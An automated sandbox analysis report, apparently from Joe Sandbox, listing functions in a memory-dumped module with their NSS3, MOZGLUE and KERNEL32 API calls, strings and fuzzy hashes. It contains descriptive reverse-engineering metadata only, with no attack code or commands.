Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID: /G6/
API String ID: 2372449006-570549270
Opcode ID: 1674dc7a626405ce6ad8170533d472281089208f5648b1a8b17a1ddf9ff32621
Instruction ID: a748f4cd7918aec3244f66f428d85392a228c0dc6c00e7453a06f51ab9bbb2d5
Opcode Fuzzy Hash: 1674dc7a626405ce6ad8170533d472281089208f5648b1a8b17a1ddf9ff32621
Instruction Fuzzy Hash: 27115931E002159BF7109B69AE09BBF73AC9F5125CF048638EC2586741F720E559C2E2

Function 6C768E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C782E62,?,?,?,?,?,?,?,00000000,?,?,?,6C754F1C), ref: 6C768EA2

Part of subcall function 6C78F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C78F854
Part of subcall function 6C78F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C78F868
Part of subcall function 6C78F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C78F882
Part of subcall function 6C78F820: free.MOZGLUE(04C483FF,?,?), ref: 6C78F889
Part of subcall function 6C78F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C78F8A4
Part of subcall function 6C78F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C78F8AB
Part of subcall function 6C78F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C78F8C9
Part of subcall function 6C78F820: free.MOZGLUE(280F10EC,?,?), ref: 6C78F8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C782E62,?,?,?,?,?,?,?,00000000,?,?,?,6C754F1C), ref: 6C768EC3
TlsGetValue.KERNEL32(?,?,?,6C782E62,?,?,?,?,?,?,?,00000000,?,?,?,6C754F1C), ref: 6C768EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C782E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C768EF1
PR_Unlock.NSS3 ref: 6C768F20

Strings

b.xl, xrefs: 6C768E96, 6C768F25

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.xl
API String ID: 1978757487-559568371
Opcode ID: 4f2b4afe9c5ffb5ac3023b2cda4dc63c5b6908bd686d56795ace8a9345bc0c89
Instruction ID: 0bf27248633425da224dfd3e084bdeffa9e5744b44cf7948229229ba98788522
Opcode Fuzzy Hash: 4f2b4afe9c5ffb5ac3023b2cda4dc63c5b6908bd686d56795ace8a9345bc0c89
Instruction Fuzzy Hash: 20217A70A096059FCB00AF2AD688599BBF4FF49318F45456EEC989BB41DB30E854CBC2

Function 6C798970 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,6C7461C4,?,6C745639,00000000), ref: 6C798991
TlsGetValue.KERNEL32(?,?,?,?,?,6C745639,00000000), ref: 6C7989AD
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C745639,00000000), ref: 6C7989C6
PR_WaitCondVar.NSS3 ref: 6C7989F7
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C745639,00000000), ref: 6C798A0C

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

Strings

9Vtl, xrefs: 6C798986

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID: 9Vtl
API String ID: 2759447159-3405884340
Opcode ID: a59f8a0d3b05f717a1f6f3f1c056173249501dd32a10281dbeaff0dad578efcc
Instruction ID: f4e669b234684eea93e30a0d6d86d57d690e48278e14349cc4747273e4c1e050
Opcode Fuzzy Hash: a59f8a0d3b05f717a1f6f3f1c056173249501dd32a10281dbeaff0dad578efcc
Instruction Fuzzy Hash: 45212AB4A046158FDB10AF78D6881AABBB4FF06358F114676DC989B606E730D894CBD2

Function 6C81A800 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 65COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C6E7915,?,?), ref: 6C81A86D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C6E7915,?,?), ref: 6C81A8A6

Strings

%s at line %d of [%.10s], xrefs: 6C81A8A0
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C81A891
/G6/, xrefs: 6C81A811
database corruption, xrefs: 6C81A89B

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$/G6/$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-816543663
Opcode ID: 0deed68436ffbfb25ad97c5b02dc72f1900b1d47acc9143d5df337a8727b2ca7
Instruction ID: b8757dfe967c82157812baf8719ba8ee13cec443c76aa573b3ad148a99a3a2eb
Opcode Fuzzy Hash: 0deed68436ffbfb25ad97c5b02dc72f1900b1d47acc9143d5df337a8727b2ca7
Instruction Fuzzy Hash: F3110671B04214ABDB248F15DD40AAEB7E6FF89714F004839FC194BF81EB34991ACB95

Function 6C852C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C852CA0
PR_ExitMonitor.NSS3 ref: 6C852CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C852CD1
strdup.MOZGLUE(?), ref: 6C852CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C852D27

Strings

Loaded library %s (static lib), xrefs: 6C852D22

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 1e1e92c2ffdae4b8db54280761f2be74c02fb09fda8a93f47f526e215f767791
Instruction ID: cdebab6ee31f0c2baab0f37a501d68b03387839753701461573fd339c85e33f9
Opcode Fuzzy Hash: 1e1e92c2ffdae4b8db54280761f2be74c02fb09fda8a93f47f526e215f767791
Instruction Fuzzy Hash: 2F11E1B16012048BEB709F59E90866A77B4AB4531DF84883DD809C7B42DB75AC28CBD1

Function 6C7468E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7468FB
EnterCriticalSection.KERNEL32 ref: 6C746913
PORT_FreeArena_Util.NSS3 ref: 6C74693E
PR_Unlock.NSS3 ref: 6C746946
DeleteCriticalSection.KERNEL32 ref: 6C746951
free.MOZGLUE ref: 6C74695D
PR_Unlock.NSS3 ref: 6C746968

Part of subcall function 6C7EDD70: TlsGetValue.KERNEL32 ref: 6C7EDD8C
Part of subcall function 6C7EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7EDDB4

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
String ID:
API String ID: 1628394932-0
Opcode ID: f3a47f559c279022b16e86ac08254cf3b9185140e81ec5421018fab4ace610c7
Instruction ID: 64d7b2031e3638c16ca92a38c0949e1469ee90bcc67990209262092e51c3d9bd
Opcode Fuzzy Hash: f3a47f559c279022b16e86ac08254cf3b9185140e81ec5421018fab4ace610c7
Instruction Fuzzy Hash: 131149B16046059FDB40AF78C18856EBBF4BF46348F05857DD899DB601EB30D988CBD2

Function 6C7A0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7487ED,00000800,6C73EF74,00000000), ref: 6C7A1000
PR_NewLock.NSS3(?,00000800,6C73EF74,00000000), ref: 6C7A1016

Part of subcall function 6C8098D0: calloc.MOZGLUE(00000001,00000084,6C730936,00000001,?,6C73102C), ref: 6C8098E5

PL_InitArenaPool.NSS3(00000000,security,6C7487ED,00000008,?,00000800,6C73EF74,00000000), ref: 6C7A102B
TlsGetValue.KERNEL32(00000000,?,?,6C7487ED,00000800,6C73EF74,00000000), ref: 6C7A1044
free.MOZGLUE(00000000,?,00000800,6C73EF74,00000000), ref: 6C7A1064

Strings

security, xrefs: 6C7A1025

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 3f9ecb6922623b799d2278788cdd4afeefb0f1e80cd8cddc5d254d54eb3ae6ab
Instruction ID: c3f1caebf103cb92ef89aa4eee85083fbf4295aaa7fd27418e159014918ffa70
Opcode Fuzzy Hash: 3f9ecb6922623b799d2278788cdd4afeefb0f1e80cd8cddc5d254d54eb3ae6ab
Instruction Fuzzy Hash: 96014870A40250DBF7302FBE9E086577A68BF0275DF010335E808D7A52EB61C116DBD1

Function 6C7E49C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000678,?,?,6C7D5F34,00000A20), ref: 6C7E49EC

Part of subcall function 6C79FAB0: free.MOZGLUE(?,-00000001,?,?,6C73F673,00000000,00000000), ref: 6C79FAC7

SECITEM_ZfreeItem_Util.NSS3(?,00000000,6C7D5F34,00000A20,?,?,?,?,?,?,?,?,?,6C7DAAD4), ref: 6C7E49F9
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,6C7D5F34,00000A20,?,?,?,?,?,?,?,?,?,6C7DAAD4), ref: 6C7E4A06
free.MOZGLUE(?,?,?,?,?,6C7D5F34,00000A20), ref: 6C7E4A16
free.MOZGLUE(?,?,?,?,?,6C7D5F34,00000A20), ref: 6C7E4A1C

Strings

4_}l , xrefs: 6C7E49C6, 6C7E4A21

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Item_UtilZfreefree
String ID: 4_}l
API String ID: 2193358613-966998971
Opcode ID: c30aea846dd0605a1dd8b6a0c44d433334fc5d322ae7b2a1b53aa75afa56e566
Instruction ID: fcc208d9807e06724d1c726af9d2663e3ca69568acec831d6ca3fbb92db0b355
Opcode Fuzzy Hash: c30aea846dd0605a1dd8b6a0c44d433334fc5d322ae7b2a1b53aa75afa56e566
Instruction Fuzzy Hash: 49011EB69001149FCB00DF69EDC8C967BBCEF8A2597458475E909DB702E731E904CBA5

Function 6C85CBE0 Relevance: 10.5, APIs: 7, Instructions: 46COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000010), ref: 6C85CBEA
PR_NewLock.NSS3 ref: 6C85CBF9

Part of subcall function 6C8098D0: calloc.MOZGLUE(00000001,00000084,6C730936,00000001,?,6C73102C), ref: 6C8098E5

PR_NewCondVar.NSS3(00000000), ref: 6C85CC05

Part of subcall function 6C72BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C7321BC), ref: 6C72BB8C

free.MOZGLUE(00000000), ref: 6C85CC1C
DeleteCriticalSection.KERNEL32(-0000001C), ref: 6C85CC34
free.MOZGLUE(00000000), ref: 6C85CC41
free.MOZGLUE(00000000), ref: 6C85CC47

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: callocfree$CondCriticalDeleteLockSection
String ID:
API String ID: 687540378-0
Opcode ID: c3f76effb725461836abb863b2c7a74f2beeae2d8d34b3136b3b9f575796c3d9
Instruction ID: 0e539782fe41bcac1fdf5c5d5b212bcd45a9e47ab370d29e98ff567ba475a57e
Opcode Fuzzy Hash: c3f76effb725461836abb863b2c7a74f2beeae2d8d34b3136b3b9f575796c3d9
Instruction Fuzzy Hash: 2DF028B17012011BEB607B7D9D4599B76AC9F4A6EDF440834E94AC3B03EB52D820CBF6

Function 6C85C9B0 Relevance: 10.5, APIs: 7, Instructions: 45COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000000,6C7D1AB6,00000000,?,?,6C7D07B9,?), ref: 6C85C9C6
free.MOZGLUE(?,?,6C7D07B9,?), ref: 6C85C9D3
DeleteCriticalSection.KERNEL32(00000000,00000001), ref: 6C85C9E5
free.MOZGLUE(?), ref: 6C85C9EC
DeleteCriticalSection.KERNEL32(00000080), ref: 6C85C9F8
free.MOZGLUE(?), ref: 6C85C9FF
free.MOZGLUE(00000000), ref: 6C85CA0B

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 309d547af8db7bc03847b303900d87af390b85a8de19f9b9cd559394db003185
Instruction ID: 6b6f76f6552607b334b2672e1ef6eea47f99b1ff46661448315c8eae3017ed87
Opcode Fuzzy Hash: 309d547af8db7bc03847b303900d87af390b85a8de19f9b9cd559394db003185
Instruction Fuzzy Hash: F30162B2600605ABDB20EFB9CC48857B7FCFE4A2657040535E906C3601D736F455CBE1

Function 6C7A6A70 Relevance: 9.1, APIs: 6, Instructions: 137COMMON

Download Yara Rule

APIs

DER_GetInteger_Util.NSS3(?), ref: 6C7A6ABF

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Integer_Util
String ID:
API String ID: 2649942920-0
Opcode ID: 5d244ecb244fcf36d4c89c8fc703608fece6a9d6d3d07ce953c53121a38bb6fc
Instruction ID: ecfee050cc7a948f0f18619ad12dadff3dc518b7aeb687e7e1acf047075ad2e2
Opcode Fuzzy Hash: 5d244ecb244fcf36d4c89c8fc703608fece6a9d6d3d07ce953c53121a38bb6fc
Instruction Fuzzy Hash: F3515CB09017009FE7248FA9DA45B967BE4EB08318F104A2DE86EC7B12E735E506CB95

Function 6C7A8810 Relevance: 9.1, APIs: 6, Instructions: 110memorythreadCOMMON

Download Yara Rule

APIs

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,?,6C7A86AA), ref: 6C7A8851

Part of subcall function 6C7A1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C74895A,00000000,?,00000000,?,00000000,?,00000000,?,6C73F599,?,00000000), ref: 6C7A136A
Part of subcall function 6C7A1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C74895A,00000000,?,00000000,?,00000000,?,00000000,?,6C73F599,?,00000000), ref: 6C7A137E
Part of subcall function 6C7A1340: PL_ArenaGrow.NSS3(?,6C73F599,?,00000000,?,6C74895A,00000000,?,00000000,?,00000000,?,00000000,?,6C73F599,?), ref: 6C7A13CF
Part of subcall function 6C7A1340: PR_Unlock.NSS3(?,?,6C74895A,00000000,?,00000000,?,00000000,?,00000000,?,6C73F599,?,00000000), ref: 6C7A145C

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,6C7A86AA), ref: 6C7A886C
PORT_ArenaAlloc_Util.NSS3(?,0000002C), ref: 6C7A8890
PR_GetCurrentThread.NSS3 ref: 6C7A891C
PR_GetCurrentThread.NSS3 ref: 6C7A8937

Part of subcall function 6C809BF0: TlsGetValue.KERNEL32(?,?,?,6C850A75), ref: 6C809C07

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_CurrentThreadValue$CriticalEnterGrowGrow_SectionUnlock
String ID:
API String ID: 3779483720-0
Opcode ID: 57e0244f431219fe306e1ddf4959795b897b115b8f87082dea811ef521946916
Instruction ID: 83ec4237deb1f95729e48f2f4ee2d9dd7f32472ad3b59cf1632381af4a04cfcc
Opcode Fuzzy Hash: 57e0244f431219fe306e1ddf4959795b897b115b8f87082dea811ef521946916
Instruction Fuzzy Hash: 6841B4B0A012429FE704CF69CE94B52BBA4FF04318F00437AD81C8B751EB71E965CB91

Function 6C752E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C742D1A), ref: 6C752E7E

Part of subcall function 6C7A07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C748298,?,?,?,6C73FCE5,?), ref: 6C7A07BF
Part of subcall function 6C7A07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7A07E6
Part of subcall function 6C7A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7A081B
Part of subcall function 6C7A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7A0825

PR_Now.NSS3 ref: 6C752EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C752EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C742D1A), ref: 6C752F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C742D1A), ref: 6C752F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C752F81

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: fee498005658813f271cfbd98619fc9380fcfd714054e9c0a742911d724fe1b7
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: ED315771A0110087F710C665FE4CFBFB269EF80318FE44A79D41A97AD0EF3299AAC651

Function 6C766B70 Relevance: 9.1, APIs: 6, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6C766BA9

Part of subcall function 6C769520: PK11_IsLoggedIn.NSS3(00000000,?,6C79379E,?,00000001,?), ref: 6C769542

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6C766BC0
PORT_ArenaAlloc_Util.NSS3(00000000,0000001C,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6C766BD7
